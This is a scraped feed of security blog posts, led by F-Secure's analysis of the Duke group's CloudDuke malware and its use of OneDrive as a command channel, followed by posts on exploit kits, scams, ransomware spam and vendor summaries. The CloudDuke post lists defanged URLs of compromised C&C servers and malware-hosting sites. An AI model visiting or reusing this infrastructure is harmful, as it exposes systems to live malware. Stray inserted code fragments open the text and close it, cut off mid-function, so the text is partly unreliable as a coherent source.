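        print(f"{hit['verdict']:18} {hit['component']:18} {hit['path']}")
```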

The first of the CloudDuke components we have observed is a downloader internally called "DropperSolution". The purpose of the downloader is to download and execute additional malware on the victim's system. In most observed cases, the downloader will attempt to connect to a compromised website to download an encrypted malicious payload which the downloader will decrypt and execute. Depending on the way the downloader has been configured, in some cases it may first attempt to log in to Microsoft's cloud storage service OneDrive and retrieve the payload from there. If no payload is available from OneDrive, the downloader will revert to the previously mentioned method of downloading from compromised websites.

We have also observed two distinct trojan components in the CloudDuke toolset. The first of these, internally called "BastionSolution", is the trojan that Palo Alto Networks described in their research into "MiniDionis". Interestingly, BastionSolution appears to functionally be an exact copy of SeaDuke with the only real difference being the choice of programming language. BastionSolution also makes significant use of a code framework that is apparently internally called "Z". This framework provides classes for functionality such as encryption, compression, randomization and network communications.

[Image: bastion_z] A list of classes in the BastionSolution trojan, including multiple classes from the "Z" framework.

Classes from the same "Z" framework, such as the encryption and randomization classes, are also used by the second trojan component of the CloudDuke toolset. This second component, internally called "OneDriveSolution", is especially interesting because it relies on Microsoft's cloud storage service OneDrive as its command and control channel. To achieve this, OneDriveSolution will attempt to log into OneDrive with a preconfigured username and password. If successful, OneDriveSolution will then proceed to copy data from the victim's computer to the OneDrive account. It will also search the OneDrive account for files containing commands for the malware to execute.

[Image: onedrive_z] A list of classes in the OneDriveSolution trojan, including multiple classes from the "Z" framework.

All of the CloudDuke "solutions" use the same loader, a piece of code whose primary purpose is to decrypt the embedded, encrypted solution, load it in memory and execute it. The Duke group has often employed loaders for their malware but unlike the previous loaders they have used, the CloudDuke loader is much more versatile with support for multiple methods of loading and executing the final payload as well as the ability to write to disk and execute additional malware components.

CloudDuke spear-phishing campaigns and similarities with CozyDuke

CloudDuke has recently been spread via spear-phishing emails with targets reportedly including organizations such as the US Department of Defense. These spear-phishing emails have contained links to compromised websites hosting zip archives that contain CloudDuke-laden executables. In most cases, executing these executables will have resulted in two additional files being written to the victim's hard disk. The first of these files has been a decoy, such as an audio file or a PDF file, while the second one has been a CloudDuke loader embedding a CloudDuke downloader, the so-called "DropperSolution". In these cases, the victim has been presented with the decoy file while in the background the downloader has proceeded to download and execute one of the CloudDuke trojans, "OneDriveSolution" or "BastionSolution".

[Image: decoy_ndi_small] Example of one of the decoy documents employed in the CloudDuke spear-phishing campaigns. It has apparently been copied by the attackers from here.

Interestingly, however, some of the other CloudDuke spear-phishing campaigns we have observed this July have borne a striking resemblance to CozyDuke spear-phishing campaigns seen almost exactly a year ago, in the beginning of July 2014. In both spear-phishing campaigns, the decoy document has been the exact same PDF file, a "US letter fax test page" (28d29c702fdf3c16f27b33f3e32687dd82185e8b). Similarly, the URLs hosting the malicious files have, in both campaigns, purported to be related to eFaxes. It is also interesting to note that in the case of the CozyDuke-inspired CloudDuke spear-phishing campaign, the downloading and execution of the malicious archive linked to in the emails has not resulted in the execution of the CloudDuke downloader but in the execution of the "BastionSolution" component, thereby skipping one step from the process described for the other CloudDuke spear-phishing campaigns.

[Image: decoy_fax] The "US letter fax test page" decoy employed in both CloudDuke and CozyDuke spear-phishing campaigns.

Increasingly using cloud services to evade detection

CloudDuke is not the first time we have observed the Duke group use cloud services in general, and Microsoft OneDrive specifically, as part of their operations. Earlier this spring we released research on CozyDuke in which we mentioned observing CozyDuke sometimes use a OneDrive account directly to exfiltrate stolen data, or alternatively download Visual Basic scripts that would copy stolen files to a OneDrive account and sometimes even retrieve files containing additional commands from the same OneDrive account.

In these previous cases the Duke group has only used OneDrive as a secondary communication channel but still relied on more traditional C&C channels for most of their actions. It is therefore interesting to note that CloudDuke actually enables the Duke group to rely solely on OneDrive for every step of their operation from downloading the actual trojan, passing commands to the trojan and finally exfiltrating stolen data.

By relying solely on 3rd party web services, such as OneDrive, as their command and control channel, we believe the Duke group is trying to better evade detection. Large amounts of data being transferred from an organization's network to an unknown web server easily raises suspicions. However, data being transferred to a popular cloud storage service is normal. What better way for an attacker to surreptitiously transfer large amounts of stolen data than the same way people are transferring that same data every day for legitimate reasons? (Coincidentally, the implications of 3rd party web services being used as command and control channels are also the subject of an upcoming talk at the VirusBulletin 2015 conference.)

Directing limited resources towards evading detection and staying ahead of defenders

Developing even a single multipurpose malware toolset, never mind many, requires time and resources. Therefore it seems logical to attempt to reuse code, such as supporting frameworks, between different toolsets. The Duke group, however, appears to have taken this a step further with SeaDuke and the CloudDuke component BastionSolution, by rewriting the same code in multiple programming languages. This has the obvious benefit of saving time and resources while providing two malware toolsets that, while similar on the inside, appear completely different on the outside. This way, the discovery of one toolset does not immediately lead to the discovery of the second toolset.

The Duke group, long suspected of ties to the Russian state, has been running its espionage operation for an unusually long time and - especially lately - with unusual brazenness. These latest CloudDuke and SeaDuke campaigns appear to be a clear sign that the Dukes are not planning to stop any time soon.

Research and post by Artturi (@lehtior2)

F-Secure detects CloudDuke as Trojan:W32/CloudDuke.B and Trojan:W64/CloudDuke.B

Samples:


Compromised servers used for command and control:

hxxps://cognimuse.cs.ntua.gr/search.php
hxxps://portal.sbn.co.th/rss.php
hxxps://97.75.120.45/news/archive.php
hxxps://58.80.109.59/plugins/search.php

Compromised websites used to host CloudDuke:

hxxp://flockfilmseries.com/eFax/incoming/5442.ZIP
hxxp://www.recordsmanagementservices.com/eFax/incoming/150721/5442.ZIP
hxxp://files.counseling.org/eFax/incoming/150721/5442.ZIP




On 22/07/15 At 11:59 AM

Read More
'Zero Days', The Documentary
'Zero Days', The Documentary

Posted by Mikko @ 12:40 GMT


VPRO (the Dutch public broadcasting organization) produced a 45-minute documentary about hacking and the trade of zero days. The documentary has now been released in English on YouTube.



The documentary features Charlie Miller, Joshua Corman, Katie Moussouris, Ronald Prins, Dan Tentler, Eric Rabe (of Hacking Team), Felix Lindner, Rodrigo Branco, Ben Nagy, The Grugq, and many others.




On 20/07/15 At 12:40 PM

Read More
IOS Crash Report: Blocking "Pop-Ups" Doesn't Really Help
IOS Crash Report: Blocking "Pop-Ups" Doesn't Really Help

Posted by Sean @ 10:15 GMT


The Telegraph published an article on Thursday about a scam targeting iOS users. Here's the gist: scammers are using JavaScript generated dialogs to display warnings of so-called "IOS Crash" reports prompting people to call for tech support. Near the end of the Telegraph's article, the following advice is offered:

"To prevent the issue happening again, go to Settings -> Safari -> Block Pop-ups."

Unfortunately, this advice is incorrect. And perhaps even more unfortunately, some security and tech pundits are now repeating the bad advice on numerous websites. How do we know the advice is wrong? Because we actually tested it…

First of all, this "IOS Crash Report" scam is a variation of the technical support scam, cases of which have been documented as early as 2008. In the past, cold-calls originated directly from call centers in India. But more recently, web-based lures are used to prompt potential victims into contacting the scammers.

A Google Search returns several live scam sites with this text:

"Due to a third party application in your phone, IOS is crashed."

Here's one of the sites as viewed with iOS Safari on an iPad:

iosclean.com

Safari's "Fraudulent Website Warning" and "Block Pop-ups" features didn't prevent the page from loading.

What looks like a pop-up in the image above is actually a JavaScript generated dialog, one which continuously re-spawns itself and can be very difficult to dismiss. Turning off JavaScript in Safari is the quickest way to regain control. Unfortunately, leaving JavaScript disabled will significantly impact a large number of legitimate websites.

Here's the same site as viewed with Google Chrome for Windows:

Prevent this page from creating additional dialogs

Notice the additional text in the image above: prevent this page from creating additional dialogs. Current versions of Chrome and Firefox (for Windows, at least) will inject this option into re-spawning dialogs, allowing the user to break the loop. Sadly, Internet Explorer and Safari do not. (We tested with IE for Windows / Windows Phone, and iOS Safari.)

Wouldn't it be great if all browsers supported this prevention feature?

Yeah, we think so, too.

But it's not just browsers, apps with browser functionality can also be affected.

Here's an example of a JavaScript dialog displayed via Cydia.

error1014.com

The end of the Telegraph's article included the following advice from City of London police:

"Never give your iCloud username and password or your bank details to someone over the phone."

Indeed! Giving somebody your iCloud password could quickly turn a support scam into a data hijacking and extortion scheme. We attempted to call several of the scammer telephone numbers to see if they would ask for our iCloud credentials — only to discover that the numbers we tried are currently not in service.

Hopefully they stay that way. (They won't.)




On 17/07/15 At 10:15 AM

Read More
Hacking Team 0-day Flash Wave with Exploit Kits

Posted by Patricia @ 12:29 GMT


After Hacking Team was compromised, a lot of information was publicly disclosed beginning on the 5th of July, in particular its business client list and a zero-day vulnerability in Adobe Flash Player that the company had been using.

Since the details of the first zero-day were made freely available, we knew attackers would swiftly move to use it. As expected, the Flash exploit was integrated into exploit kits such as Angler, Magnitude, Nuclear, Neutrino, Rig, and HanJuan, as reported by Kafeine.

Based on our telemetry, there was a rise in Flash exploits beginning on the 6th that continued until the 9th.

overall_stats (11k image)


Here are the stats for each exploit kit:

ek_stats (27k image)


The security advisory for the CVE-2015-5119 zero-day was released on the 7th of July and the patch was made available on the 8th, so the hits started to decline about two days after the patch.

But just when people had started updating their systems, there was yet another spike in Angler Flash exploit hits:

weekend_wave_stats (22k image)


Apparently, two more Flash vulnerabilities, CVE-2015-5122 and CVE-2015-5123, were discovered. These vulnerabilities are still waiting to be patched. According to Kafeine, one of the two vulnerabilities was added to the Angler exploit kit.

As a side note related to the Angler exploit kit: if you look at the second chart above, Angler and HanJuan share the same statistics. This is because our detections for Angler Flash exploits were also hitting on HanJuan Flash exploits.

We verified this after discovering that a different URL pattern was being detected as Angler:

angler_vs_hanjuan_urlpattern (9k image)


We looked at the Flash exploit used by both kits, and the two are nearly identical.

Angler Flash Exploit:

anglerek_ht0d_3 (26k image)


HanJuan Flash Exploit:

hanjuanek_ht0d_3 (23k image)


There was already speculation that there are strong connections between the actors behind the two exploit kits. For example, both have used "fileless" delivery of the payload and even similar encryption methods. Perhaps at some point we will see HanJuan supporting this new Flash 0-day as well.

In the meantime, since there hasn't been a patch released yet for these new ones, our users remain protected from the effects of the exploit kits through Browsing Protection as well as these detections:

Exploit:SWF/AnglerEK.L
Exploit:SWF/NeutrinoEK.C
Exploit:SWF/NeutrinoEK.D
Exploit:SWF/NuclearEK.H
Exploit:SWF/NuclearEK.J
Exploit:SWF/Salama.H
Exploit:SWF/Salama.R
Exploit:JS/AnglerEK.D
Exploit:JS/NuclearEK.I
Exploit:JS/MagnitudeEK.A

UPDATE: Adobe has released patches for the recent two vulnerabilities: CVE-2015-5122 and CVE-2015-5123. Users are recommended to update to the latest version of Adobe Flash Player.






On 13/07/15 At 12:29 PM

Read More
The Trusted Internet: Who governs who gets to buy spyware from surveillance software companies?

Posted by FSLabs @ 02:31 GMT


When hackers get hacked, that's when secrets are uncovered. On July 5th, Italy-based surveillance technology company Hacking Team was hacked. The hackers released a 400GB torrent file with internal documents, source code, and emails to the public - including the company's client list of close to 60 customers.

The list included countries such as Sudan, Kazakhstan and Saudi Arabia - despite official company denials of doing business with oppressive regimes. The leaked documents strongly implied that in the South-East Asian region, government agencies from Singapore, Thailand and Malaysia had purchased their most advanced spyware, referred to as a Remote Control System (RCS).

According to security researchers at Citizen Lab, this spyware is extraordinarily intrusive, with the ability to turn on the microphone and cameras on mobile devices, intercept Skype and instant messages, and use an anonymizer network of proxy servers to prevent harvested information from being traced back to the command and control servers.

Based on images of the client list posted to pastebin, the software was purchased in Malaysia by the Malaysia Anti-Corruption Commission (MACC), Malaysia Intelligence (MI) and the Prime Minister's Office (PMO):

hacking_team_client_list (86k image)

Additional images of leaked invoices posted to medium.com indicated the spyware was sold through a locally-based Malaysian company named Miliserv Technologies (M) Sdn Bhd (registered with the Ministry of Finance Malaysia), which specializes in providing digital forensics, intelligence gathering and public security services:

hacking_team_hack_1 (95k image)

hacking_team_hack_2 (72k image)

Why the Prime Minister's Office would need surveillance software remains puzzling. Mind you, professional grade spyware ain't cheap - a license upgrade could cost you MYR400,000 and a maintenance renewal will set you back about MYR160,000.

According to reports of the incident in Malaysian alternative media, Malaysian government agencies have probably been using the spyware even before discovery of the FinFisher malware that was detected in the run-up to the 2013 General Elections.

Coincidentally, Malaysia has also been the frequent host of the annual ISS World Asia tradeshow, where companies promote their arsenal of 'lawful' surveillance software to law enforcement agencies, telco service providers, or government employees. During the 2014 event, Hacking Team was present and was the associate lead sponsor of the event.

MiliServ Technologies is currently involved in the upcoming 2015 ISS World Asia in Kuala Lumpur. The event is invitation-only, though it may be interesting to see if Hacking Team will make it there this year.


Post by – Su Gim




On 08/07/15 At 02:31 AM

Read More
Problematic Wassenaar Definitions

Posted by Sean @ 13:25 GMT


The Wassenaar Arrangement, a multilateral export control regime, defines "intrusion software" as software specially designed or modified to avoid detection by monitoring tools, or to defeat protective countermeasures, of a computer or network capable device. Intrusion software is used to: extract data or information, or to modify system or user data; or to modify the standard execution path of a program or process in order to allow the execution of externally provided instructions.

Wassenaar states that monitoring tools are software or hardware devices that monitor system behaviours or processes running on a device. This includes antivirus (AV) products, endpoint security products, Personal Security Products (PSP), Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS) and firewalls.

Wassenaar Arrangement definitions
(Source)


So… what we at F-Secure (and the rest of the antivirus industry) call "malware" appears to easily fit Wassenaar's definition of intrusion software.

Why is this interesting?

Well, the US Bureau of Industry and Security (BIS), part of the US Department of Commerce, has proposed updating its rules to require a license for the export of intrusion software.

And according to the Dept of Commerce, "an export" is –any– item that is sent from the United States to a foreign destination. "Items" include among other things, software and technology.

The Paradox

So… if malware is intrusion software, and any item is an export, how exactly are US-based customers supposed to submit a malware sample to their European antivirus vendor? Seriously, customers send us malware that uses zero-days all the time. Not to mention the samples that we routinely exchange with other trusted AV vendors from around the globe.

Unintended Consequences

The text associated with the BIS proposal says the scope includes penetration testing products that use intrusion software in what looks like an attempt to limit "hacking" tools, but there is nothing about what is excluded from the scope. So the BIS might not intend to limit customers from uploading malware samples to their AV vendor, but that could be the effect if this new rule is adopted and arbitrarily enforced. Or else it could just force people to operate in a legal limbo. Is that what we want?

The BIS is taking comments until July 20th.




On 09/06/15 At 01:25 PM

Read More
Found Item: UK Wi-Fi Law?

Posted by Sean @ 13:27 GMT


I visited the UK last Thursday, found a coffee shop offering "free" Wi-Fi, and read this…

"UK Law states that we must know who is using our Wi-Fi at all times."

Now I'm not a lawyer — but that seems like quite the disingenuous claim.

_WalkinWiFi

Mobile number, post code, and date of birth??

I wonder how many people fall for this type of malarkey.

Post by — @Sean




On 08/06/15 At 01:27 PM

Read More
SMS Exploit Messages

Posted by Sean @ 13:56 GMT


There's an iOS vulnerability affecting iPhone, iPad, and even Apple Watch that allows for a denial of service.

Crashing a phone with an SMS? That's so 2008.


S60 SMS Exploit Messages

Unlike 2008, this time kids are reportedly using the vulnerability to harass others.

Apple is working on a security update. But unfortunately… that update very likely won't be available for older iPhones.

Updated to add:

Here's the "Effective Power" exploit crashing an iPhone 6:


Effective Power Unicode iOS hack on iPhone 6

And this… is Effective Power crashing the iOS Twitter app:


Effective Power Unicode iOS hack vs Twitter




On 28/05/15 At 01:56 PM

Read More
Ransomware Spam E-Mails Targeting Users in Italy and Spain

Posted by FSLabs @ 03:17 GMT


In the past few days, we received some cases from our customers in Italy and Spain, regarding malicious spam e-mails that pointed to Cryptowall or Cryptolocker ransomware.

The spam e-mails pretended to come from a courier/postal service, regarding a parcel that was waiting to be collected. The e-mails offer a link to track that parcel online:

crypt_email (104k image)

When we did the initial investigation of the e-mails from our standard test system, the link redirected to Google:

crypt_email_redirect_italy (187k image)

So, no malicious behavior? Well, we noted that the first two URLs pointed to PHP pages. Since PHP code is executed on the server side, not locally on the client, it is possible that the servers were 'deciding' whether to redirect the user to Google or to serve malicious content, based on some preset conditions.

Since this particular spam e-mail is written in Italian - perhaps only a customer based in Italy would be able to see the malicious payload? Fortunately, we have Freedome, so we can travel to Italy for a little while to experiment.

So we turned on Freedome, set the location to Milan and clicked the link in the e-mail again:

crypt_email_mal_italy (302k image)

Now we see the bad stuff. If the user is (or appears to be) located in Italy, the server will redirect them to a malicious file hosted on a cloud storage server.

The e-mail spam sent to Spanish users is similar, though in those cases, a CAPTCHA challenge is included to make the site seem more authentic. If the link in the e-mail is clicked by a user located outside Spain, again we end up in Google:

crypt_email_redirect_spain (74k image)

If the site is visited instead from a Spanish IP, we get to the CAPTCHA screen:

crypt_email_target_spain (57k image)

And then to the malware itself:

crypt_email_mal_spain (313k image)

This spam campaign doesn't use any exploits (so far), just old-fashioned social engineering; infection only occurs if the user manually downloads and executes the files offered on the malicious URLs. For our customers, the URLs are blocked and the files are detected.

(malware SHA1s: 483be8273333c83d904bfa30165ef396fde99bf2, 295042c167b278733b10b8f7ba1cb939bff3cb38)

Post by — Victor




On 19/05/15 At 03:17 AM

Read More
Mac Hack Demonstration

Posted by Sean @ 12:46 GMT


Securing your SSH password is very important. Otherwise, you might be pwned by a little girl with her Raspberry Pi.

Kids hack their Dad's computer on her Raspberry Pi

Don't worry, it's an authorized hack, she asked her mom for permission.




On 15/05/15 At 12:46 PM

Read More
Email Security Considerations for Microsoft 365 Users

The post Email Security Considerations for Microsoft 365 Users appeared first on GreatHorn.

Read More
Email Security Considerations for Google Workspace Users

The post Email Security Considerations for Google Workspace Users appeared first on GreatHorn.

Read More
Show the Value of Your Email Security Solutions: Don’t Just Measure Detection Rates

The post Show the Value of Your Email Security Solutions: Don’t Just Measure Detection Rates appeared first on GreatHorn.

Read More
Universities and Colleges Face Multi-faceted Email Security Challenges

The post Universities and Colleges Face Multi-faceted Email Security Challenges appeared first on GreatHorn.

Read More
Spam vs Phish: The Problem with User-Reported Phish Buttons

The post Spam vs Phish: The Problem with User-Reported Phish Buttons appeared first on GreatHorn.

Read More
Phishing for Google Impersonation Attacks

Bad actors around the globe go phishing in emails twenty-four hours a day, seven days a week. Whether they are “guppies” like your local bakery down the street or big “fish” like Google, no one is immune to their attacks. Google, one of the largest, most well-known – and used – applications, will always be […]

The post Phishing for Google Impersonation Attacks appeared first on GreatHorn.

Read More
GMX.Net Phishing Campaigns: Why They’re Hitting Users’ Inboxes

The post GMX.Net Phishing Campaigns: Why They’re Hitting Users’ Inboxes appeared first on GreatHorn.

Read More
Native vs SEG vs ICES: What You Need to Know About Email Security

The shift from on-premise email platforms to cloud email platforms has taken shape, with the majority (70%) of organizations. Microsoft 365 and Google Workspace remain the predominant email platforms for organizations. However, a significant change has occurred in the past year. With an estimated 40% of ransomware attacks that start through email, and BEC and […]

The post Native vs SEG vs ICES: What You Need to Know About Email Security appeared first on GreatHorn.

Read More
Blueberry Muffins vs Blonde Chihuahuas: Debunking Artificial Intelligence in Email Security

In cybersecurity, buzzwords come and go, often being replaced with new buzzwords while the market is still attempting to realize the benefits of the former. Today, every technology vendor is talking about Artificial Intelligence (AI). In reality, Machine Learning (the method to one day achieve AI) is still the predominant technical solution deployed within vendor […]

The post Blueberry Muffins vs Blonde Chihuahuas: Debunking Artificial Intelligence in Email Security appeared first on GreatHorn.

Read More
Global Supply Chain: Attackers Targeting Business Deliveries

Our global supply chain includes all the people, companies and countries that need to work cohesively to manufacture, process and ship goods. Disruptions in the global supply chain are increasingly impacting organizations, with logistical problems crossing most industries.  As a result, the continued strain on the supply chain puts added pressure on businesses as they […]

The post Global Supply Chain: Attackers Targeting Business Deliveries appeared first on GreatHorn.

Read More
Digital Warfare and the New Geopolitical Frontline

This article follows our recent article on the source of cybercrime attacks – read it here – we’re now exploring the global, commercial, and political dimensions of digital warfare. Key takeaways $100 billion in global cyber damages annually – equivalent to the GDP of a mid-sized nation. $400 million in business impact from a single […]

The post Digital Warfare and the New Geopolitical Frontline appeared first on Heimdal Security Blog.

Read More
Nearly 40% of 2024 Ransomware Payouts May Have Gone to Russia, China & North Korea

Ransomware victims paid an estimated $813 million in 2024. Nearly 40 percent of that may have gone to actors in Russia, China and North Korea, according to new analysis from cybersecurity firm Heimdal. Heimdal used recent telemetry, infrastructure tracing and ownership mapping to assess how ransomware revenue is likely distributed. The $813 million figure comes […]

The post Nearly 40% of 2024 Ransomware Payouts May Have Gone to Russia, China & North Korea appeared first on Heimdal Security Blog.

Read More
What is Managed ITDR? Key Definitions, Features, and Benefits

Key takeaways: MITDR explained: Managed ITDR combines identity threat detection with expert-led response. Why it matters: Get better protection and lower costs without building a full in-house team. What to look for: Prioritize behavioral monitoring, real-time response, and expert oversight You’ve got the ITDR solution. That’s a good step towards effective account and identity-based threat […]

The post What is Managed ITDR? Key Definitions, Features, and Benefits appeared first on Heimdal Security Blog.

Read More
Retail cybersecurity statistics for 2025

Cyber attacks against retail businesses have made headlines in 2025. Read this retail cybersecurity statistics rundown to understand more.  For cyber criminals, the retail sector makes for a very attractive target. Retail businesses hold vast troves of valuable customer details, payment information and inventory data. What is more, any disruption caused by cyber crime is […]

The post Retail cybersecurity statistics for 2025 appeared first on Heimdal Security Blog.

Read More
Cyber Insurance Statistics for 2025

More and more businesses are taking out cyber insurance in 2025. Read our statistics rundown to understand why.  Investing in cyber insurance is a smart move. In case of a cyber attack, it can reduce the financial burden of a breach and give businesses (and individuals) peace of mind.  Advanced cybersecurity software should always be […]

The post Cyber Insurance Statistics for 2025 appeared first on Heimdal Security Blog.

Read More
Is Your Tech Stack Killing Profitability? The Silent Bug Crippling MSP Growth

Many MSPs want to grow, but internal complexity often holds them back. In this guest article, Portland, a Heimdal partner, breaks down how fragmented systems and unclear value messaging can quietly erode profits, compliance, and trust – and how to fix it.  The “system bug” holding MSPs back “Stop talking about technology. Start talking about […]

The post Is Your Tech Stack Killing Profitability? The Silent Bug Crippling MSP Growth appeared first on Heimdal Security Blog.

Read More
Cybersecurity Has a Motivation Problem

I’ve worked in cybersecurity long enough to see that our biggest challenge isn’t a technical one, it’s motivational. We can build the strongest firewalls, design the smartest detection systems, and run endless awareness campaigns, but none of it matters if people don’t want to care. That’s the uncomfortable truth; cyber security has a motivation problem. […]

The post Cybersecurity Has a Motivation Problem appeared first on Heimdal Security Blog.

Read More
Agent Fatigue Is Real and Your Security Stack Is to Blame

Your senior analyst stares at alert number 47. It’s not even lunch. Another “suspicious login detected.” They switch to the third dashboard of the morning, cross-reference the user activity, and confirm what they already knew. Bob from accounting is working late again. Meanwhile, three dashboards over, actual lateral movement is happening on a client’s network. […]

The post Agent Fatigue Is Real and Your Security Stack Is to Blame appeared first on Heimdal Security Blog.

Read More
Heimdal 5.0.0 RC: RDP Protection, Ransomware Detection, and OS Deployment

Version 5.0.0 adds three major features for MSPs: a module that controls RDP access, an improved ransomware detection engine, and a simpler way to deploy Windows over the network. Remote Access Protection (RAP): Block Unauthorized RDP Attempts. RDP brute-force attacks remain a top breach vector, so we built a new module that monitors and filters Remote […]

The post Heimdal 5.0.0 RC: RDP Protection, Ransomware Detection, and OS Deployment appeared first on Heimdal Security Blog.

Read More
Where Ransomware Profits Go and How to Cut Them Off

Researched and written by Heimdal founder Morten Kjaersgaard, this article exposes how even limited cooperation between registry bodies and law enforcement could cripple ransomware networks and raise the cost for cybercriminals. This article serves as a wake-up call. Even limited cooperation between registry bodies and law enforcement could cripple ransomware networks and raise the cost […]

The post Where Ransomware Profits Go and How to Cut Them Off appeared first on Heimdal Security Blog.

Read More
ITDR vs EDR: What are the Key Differences?

Key takeaways: What are the main differences between ITDR, EDR, and other security solutions? How does ITDR provide effective protection against identity-based threats? How to effectively detect and respond to attacks. If there’s one thing the cybersecurity community loves, it’s an acronym. To some extent, this has been the case since the earliest days of cybersecurity. […]

The post ITDR vs EDR: What are the Key Differences? appeared first on Heimdal Security Blog.

Read More
What Is Identity Threat Detection and Response?

Key insights: What is identity threat detection and response (ITDR)? What are the differences and similarities between ITDR and EDR? What are the alternatives to ITDR? Identity Threat Detection and Response (ITDR) is a comparatively new term in the cybersecurity scene. It was first coined by Gartner in 2022 and has since become a cornerstone […]

The post What Is Identity Threat Detection and Response? appeared first on Heimdal Security Blog.

Read More
Small Business Cybersecurity Statistics in 2025

Small businesses are a big target for cyber criminals. Read our small business statistics rundown to get a true picture of how the sector is being affected in 2025. Until relatively recently, cybercrime wasn’t perceived as a major risk for small businesses. Hackers traditionally focused on larger companies or government bodies with more money and […]

The post Small Business Cybersecurity Statistics in 2025 appeared first on Heimdal Security Blog.

Read More
Follow the Money Blueprint For MSP Success (With Dave Sobel)

“If I was starting an MSP today, I am not sure I would start an MSP.” Now that’s a way to grab your attention when opening a podcast. Coming from Dave Sobel, someone who’s been an MSP owner, vendor executive, and now runs The Business of Tech podcast – that’s not a throwaway comment. Dave […]

The post Follow the Money Blueprint For MSP Success (With Dave Sobel) appeared first on Heimdal Security Blog.

Read More
Digital doppelgängers: How sophisticated impersonation scams target content creators and audiences

Content creation is no longer niche. Over 50 million Americans earn income by making videos, livestreams, podcasts, or other digital media. Many are full-time creators, while others pursue it as a side hustle. Either way, having an online presence is becoming increasingly risky.  Scammers are catching on. In 2024 alone, the Federal Trade Commission’s logged […]

The post Digital doppelgängers: How sophisticated impersonation scams target content creators and audiences appeared first on Heimdal Security Blog.

Read More
Finger.exe & ClickFix, (Sun, Nov 16th)

The finger.exe command is used in ClickFix attacks.

Read More
SANS Holiday Hack Challenge 2025, (Sun, Nov 16th)

The SANS Holiday Hack Challenge™ 2025 is available.

Read More
Honeypot: FortiWeb CVE-2025-64446 Exploits, (Sat, Nov 15th)

Like many have reported, we too noticed exploit attempts for CVE-2025-64446 in our honeypots.

Read More
Microsoft Office Russian Dolls, (Fri, Nov 14th)

Read More
ISC Stormcast For Friday, November 14th, 2025 https://isc.sans.edu/podcastdetail/9700, (Fri, Nov 14th)

No summary available.

Read More
Formbook Delivered Through Multiple Scripts, (Thu, Nov 13th)

When I'm teaching FOR610[1], I always say to my students that reverse engineering does not only apply to “executable files” (read: PE or ELF files). Most of the time, the infection path involves many stages to defeat the security analyst or security controls. Here is an example that I found yesterday. An email was received with an attached ZIP archive. It contained a simple file: “Payment_confirmation_copy_30K__202512110937495663904650431.vbs” (SHA256:d9bd350b04cd2540bbcbf9da1f3321f8c6bba1d8fe31de63d5afaf18a735744f), detected by 17/65 antivirus engines on VT[2]. Let's have a look at the infection path.

Read More
ISC Stormcast For Thursday, November 13th, 2025 https://isc.sans.edu/podcastdetail/9698, (Thu, Nov 13th)

No summary available.

Read More
SmartApeSG campaign uses ClickFix page to push NetSupport RAT, (Wed, Nov 12th)

Introduction

Read More
ISC Stormcast For Wednesday, November 12th, 2025 https://isc.sans.edu/podcastdetail/9696, (Wed, Nov 12th)

No summary available.

Read More
Microsoft Patch Tuesday for November 2025, (Tue, Nov 11th)

Today's Microsoft Patch Tuesday offers fixes for 80 different vulnerabilities. One of the vulnerabilities is already being exploited, and five are rated as critical.

Read More
New Android Malware Platform Targets Bank Accounts

Researchers at Zimperium are tracking a new malware-as-a-service platform designed to target Android phones with banking Trojans. The platform, dubbed “Fantasy Hub,” allows unskilled threat actors to launch sophisticated malware campaigns that trick victims into granting access to their bank accounts.

Read More
2025 Cybersecurity Awareness Month by the Numbers

Organizations rely on KnowBe4 to educate millions of people each month on security awareness and compliance topics, and every October, during Cybersecurity Awareness Month, engagement with our training content sets new records. 2025 was no exception.

Read More
Your KnowBe4 Compliance Plus Fresh Content Updates from October 2025

We’re thrilled to announce KnowBe4 Studios, uniting our world-class creative teams under one powerful brand for our Compliance Plus library. Leveraging the latest AI technologies and the expertise of our global content creators, we’re set to produce more engaging compliance training than ever before—including fresh microcontent, interactive games and expanded storytelling experiences. This evolution marks the next phase in our quest to disrupt compliance training, which in combination with our security awareness training, helps your organization rise above risk. 

Read More
Tycoon 2FA Phishing Kit Grows More Sophisticated

Cybereason warns that the Tycoon 2FA phishing kit continues to receive upgrades, allowing unskilled cybercriminals to launch sophisticated social engineering attacks. The platform is known for its ability to bypass multi-factor authentication measures.
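
The entry above does not say how Tycoon 2FA gets past MFA; kits of this class are assumed here to operate as an adversary-in-the-middle reverse proxy that relays the genuine login page and captures the one-time code and the resulting session cookie. What such a proxy cannot forge is the origin and the rpId that the victim's browser and authenticator bind into a WebAuthn assertion. The relying-party checks below are an added example, not code from the page, from Cybereason or from the Tycoon 2FA kit; the rpId, the allowed origins, the fixed challenge and the lookalike host are constructed for the demonstration, and signature verification over authData plus SHA-256(clientDataJSON) is deliberately left out.

```python
"""Relying-party checks that make a relayed WebAuthn assertion fail.

Added example; not from the original page. RP_ID, ALLOWED_ORIGINS, the fixed
CHALLENGE and the lookalike host are assumptions for the demo.
"""
import base64
import hashlib
import json

RP_ID = "example.com"                                                   # assumption
ALLOWED_ORIGINS = {"https://example.com", "https://login.example.com"}  # assumption
CHALLENGE = bytes(range(32))   # fixed for the demo; a real server uses os.urandom(32)

FLAG_UP = 0x01  # user present
FLAG_UV = 0x04  # user verified


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def browser_client_data(origin, challenge):
    """What the browser builds for navigator.credentials.get(). The origin is
    the page actually loaded; a proxy on another host cannot rewrite it."""
    payload = {"type": "webauthn.get", "challenge": b64url_encode(challenge),
               "origin": origin, "crossOrigin": False}
    return b64url_encode(json.dumps(payload, separators=(",", ":")).encode())


def authenticator_data(rp_id, counter=1, flags=FLAG_UP | FLAG_UV):
    """rpIdHash (32) || flags (1) || signCount (4). The authenticator hashes the
    rpId the browser passes, which is tied to the page's effective domain."""
    return hashlib.sha256(rp_id.encode()).digest() + bytes([flags]) + counter.to_bytes(4, "big")


def verify_assertion(client_data_b64, auth_data, expected_challenge,
                     rp_id=RP_ID, allowed_origins=ALLOWED_ORIGINS):
    """Return (ok, reason); the order follows the WebAuthn verification steps."""
    try:
        client_data = json.loads(b64url_decode(client_data_b64))
    except (ValueError, UnicodeDecodeError):
        return False, "clientDataJSON not decodable"
    if client_data.get("type") != "webauthn.get":
        return False, "unexpected ceremony type"
    if client_data.get("challenge") != b64url_encode(expected_challenge):
        return False, "challenge mismatch (replay or wrong session)"
    origin = client_data.get("origin")
    if origin not in allowed_origins:
        return False, "origin %r is not the relying party" % origin
    if len(auth_data) < 37:
        return False, "authenticatorData too short"
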